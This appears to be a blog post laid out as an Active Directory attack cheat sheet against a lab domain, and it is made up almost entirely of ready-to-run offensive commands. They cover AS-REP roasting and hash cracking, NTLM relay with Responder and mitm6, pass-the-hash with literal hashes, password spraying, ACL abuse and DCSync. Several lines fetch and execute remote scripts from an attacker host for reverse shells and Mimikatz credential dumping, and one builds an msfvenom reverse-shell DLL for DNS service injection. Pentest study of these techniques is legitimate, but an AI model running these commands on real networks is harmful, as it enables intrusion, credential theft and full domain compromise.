Enumerate Active Directory
From Linux we can execute modules and files in Powershell like Powerview, this is a great advantage if we are connected to an internal network, "We will save by evading AV/EDR signatures and behaviors as long as we're in the right segment active directory.
Install Powershell on Linux
> sudo apt update && sudo apt install -y curl gnupg apt-transport-https
> curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
> sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debianbullseye-
> prod bullseye main" > /etc/apt/sources.list.d/microsoft.list'
> sudo apt update && sudo apt install -y powershell
> pwsh
Enumerate AD with Bloodhound-python
Example:
> bloodhound-python -u kai.bel -p password1 -ns 192.168.200.129 -d cs.org -c All
Resources:
1 - https://github.com/fox-it/BloodHound.py
2 - https://github.com/BloodHoundAD/BloodHound
Search Users DCSync Rights in BloodHound
Search Users AS-REP Roastable Users (DontReqPreAuth) in BloodHound
Search Unconstrained Delegation in BloodHound
Search Shortest Paths to Domain Admins in BloodHound
Identificate actives with crackmapexec
Example:
crackmapexec smb 192.168.200.0/24 -d cs.org
Identificate actives with nmap
Example:
nmap -sV -p445,139 192.168.200.0/24 -vvv
In this scenario we find 3 devices 1 DC and 2 workstations.
we have blocked access to shared folders.
nmap --script smb-enum-shares -p 139,445 192.168.100.0/24
nmap --script=smb-enum* --script-args=unsafe=1 -T5 192.168.100.7
Identificate actives with nbtscan
Example:
nbtscan -r 192.168.200.0/24
AS-REP Roasting
ASREPRoast attack looks for users with don't require Kerberos pre-authentication attribute
(DONT_REQ_PREAUTH).
Impacket GetNPUsers
ASREPRoast attack looks for users with don't require Kerberos pre-authentication attribute
(DONT_REQ_PREAUTH).
Example:
/usr/bin/GetNPUsers.py cs.org/kai.bel:password1 -dc-ip 192.168.200.129 -request -format john -
outputfile outputfile.txt
View hashes dump.
Password cracking with john
Example:
john--format:krb5asrep outputfile.txt--wordlist=/usr/share/seclists/Passwords/xato-net-10- millionpasswords-100000.txt
Resources:
1-https://github.com/openwall/john
2-https://github.com/SecureAuthCorp/impacket/
SMB Signing Disabled / ntlmrelayx
This kind of attack is very dangerous because anybody with access to the network can capture
traffic, relay it, and get unauthorized access to the servers.
Lateral Movement via SMB Relaying.
Responder and ntlmrelayx.py (Local Admin Dumping local SAM hashes)
Example:
sudo nano /usr/share/responder/Responder.conf (edit smb for off and https off)
sudo python3 /usr/share/responder/Responder.py -I eth0 -dw
sudo ln -s /usr/share/doc/python3-impacket/examples/* /usr/bi
sudo ntlmrelayx.py -tf target.txt -smb2support
Victim: You will manually enter a shared path.
Reverse TCP Responder and ntlmrelayx.py
sudo python3 /usr/share/responder/Responder.py -I eth0 -dw
python3 -m http.server 8080
ntlmrelayx.py -tf /home/hernan/target.txt -smb2support -c "powershell IEX(New-Object
Net.WebClient).downloadString('http://192.168.1.6:8080/Invoke-PowerShellTcp.ps1')"
nc -lvp 443
Mitm6 and ntlmrelayx.py
Example:
pip install mitm6
ntlmrelayx.py -6 -wh 192.168.1.6 -tf /home/hernan/target.txt -socks -debug -smb2support
ntlmrelayx.py -6 -wh 192.168.1.6 -tf /home/hernan/target.txt -socks -debug -smb2support
Victim:
ntlmrelayx> socks
Pass The Hash
It is a technique that allows an attacker to authenticate to a remote server or service using the
underlying NTLM or LanMan hash of a user's password, rather than requesting the associated plain
text password, as is often the case.
crackmapexec
Example:
crackmapexec smb -u 'Administrador' -H '2b73e1a325df8ca7bd82063457391964' --exec-method
smbexec -x whoami 192.168.200.0/24 -d cs.org
Evil-Winrm
Example:
evil-winrm -u Administrador -H '2b73e1a325df8ca7bd82063457391964' -i 192.168.200.129
Pth-Winexe
Example:
pth-winexe -U cs.org/Administrador
%aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964 //192.168.200.129
cmd.exe
Impacket
Example:
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964
cs.org/Administrador@192.168.200.129
Example:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964
cs.org/Administrador@192.168.200.129
Example:
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964
cs.org/Administrador@192.168.200.129
Password Spraying
Password spraying is a technique used by an attacker to obtain valid access credentials that consist
of trying the same password on multiple users.
crackmapexec
Password spraying SMB
Example:
crackmapexec smb 192.168.200.128 -d cs.org -u users.txt -p 'Changeme123!'
Connect remote SMB
Example:
/usr/bin/smbexec.py 'cs.org/administrador:cs2022!@192.168.200.128'
Example:
crackmapexec smb 192.168.200.128 -u 'administrador' -p 'cs2022!' -X 'ipconfig' -d cs.org
Password spraying winrm
Example:
crackmapexec winrm 192.168.200.129 -d cs.org -u /home/hernan/users.txt -p 'Changeme123!'
Connect remote winrm
Example:
evil-winrm -i 192.168.200.129 -u lancelot.carla -p Changeme123!
Resources:
1-https://github.com/Porchetta-Industries/CrackMapExec
2-https://github.com/SecureAuthCorp/impacket/
3-https://github.com/Hackplayers/evil-winrm
Abusing ACLs/ACEs
Any misconfiguration in the registry's ACL permissions can allow a standard user (with low
privileges) to make settings in GPOs, add users to a specific group, change passwords, etc.
In this scenario we can see that the users of the "Marketing" group have permissions to add users to
the "Project Management" group, change passwords, etc.
Changing passwords:
$Pass = ConvertTo-SecureString 'P@ssw0d!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('cs.org\merry.inger', $Pass)
Adding a group
Add-DomainObjectAcl -Credential $Creds -TargetIdentity "Domain Admins" -Rights
WriteMembers
posdata: This proof of concept can be done with PowerView. (I will omit to add an image)
DnsAdmin
For the attack to work, you must have compromised an account that is a member of the DNS
administrators group or that has write privileges on a DNS server object.
The attack vector consists of injecting a malicious DLL into the DNS process that runs as a system
to scale when the service is restarted.
Example:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.1.6 LPORT=80 -f dll >
dns.dll
dnscmd.exe DC-01 /config /serverlevelplugindll C:\Users\kai.bel\Documents\dns.dll
sc.exe stop dns
sc.exe start dns
DCSync
Abuse in AD where a user who is member of the DNSAdmins group or have write privileges to a
DNS server object can load an arbitrary DLL with SYSTEM privileges on the DNS server
Mimikatz
Example:
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/Invoke-Mimikatz.ps1');
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:cs.org /user:Administrador"'
Impacket
Example:
secretsdump.py cs.org/elle.maggee:password@192.168.200.129 -just-dc
secretsdump.py cs.org/elle.maggee:password@192.168.200.129 -just-dc-user krbtgt
! Thank you very much !
No comments:
Post a Comment